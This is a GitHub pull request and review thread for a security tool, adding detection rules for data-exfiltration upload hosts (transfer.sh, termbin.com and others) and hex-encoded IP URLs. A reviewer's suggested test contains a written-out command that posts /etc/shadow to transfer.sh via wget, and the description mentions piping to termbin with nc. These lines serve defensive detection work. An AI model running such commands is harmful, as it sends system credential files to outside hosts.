feat(threats): detect ephemeral file-upload hosts and hex-encoded IP URLs#41
Open
AdamWen230 wants to merge 2 commits into
Open
feat(threats): detect ephemeral file-upload hosts and hex-encoded IP URLs#41AdamWen230 wants to merge 2 commits into
AdamWen230 wants to merge 2 commits into
Conversation
…URLs Add CLT-URL-006 (data-exfil upload hosts: transfer.sh, file.io, temp.sh, bashupload.com, termbin.com, 0x0.st) and CLT-URL-007 (hex-encoded IP in URL, complementing CLT-URL-004's dotted-decimal coverage). Adds url-artifact support to the test createMatcher helper and a new url-threats.test.ts (20 cases, positive + FP-boundary negatives).
Collaborator
|
Hi AdamWen230, really nice work on this one. One fix required and one question before we merge: Fix: add a wget test for CLT-URL-006 branch 2 The pattern includes wget in the network-tool gate but none of the tests exercise it: it("detects bare-domain transfer.sh upload via wget", () => {
expect(matchCommand(engine, "wget https://transfer.sh/ --post-file /etc/shadow")).toContain("CLT-URL-006");
});Question: private-range handling in CLT-URL-007 CLT-URL-004 explicitly excludes loopback and RFC1918 ranges; CLT-URL-007 doesn't, so http://0x7f.0x0.0x0.0x1/ (hex-encoded 127.0.0.1) would match. Was that intentional? If so, a short comment in the YAML explaining the omission would help future maintainers, otherwise it looks like an oversight compared to CLT-URL-004. Happy to approve once the wget test is in and we've heard back on the IP range question. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
3 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
What
Adds two URL threat rules:
http://0xcb.0x0.0x71.0x5/for 203.0.113.5), complementing CLT-URL-004's dotted-decimal coverage.Why
Design notes
[command, url]: termbin.com is used vianc termbin.com 9999with no URL scheme, so it never becomes aurlartifact. The pattern requires a scheme OR a network tool (nc/curl/wget) to avoid false-positives on local scripts named e.g.transfer.sh.0x(e.g. 0x0.st) is not misclassified as a hex IP.Tests
New
url-threats.test.ts— 20 cases (positive coverage for every host /hex form + negative cases locking the FP boundaries). Also addsurlartifact support to thecreateMatchertest helper, since URL rules previously had no heuristics-level unit coverage.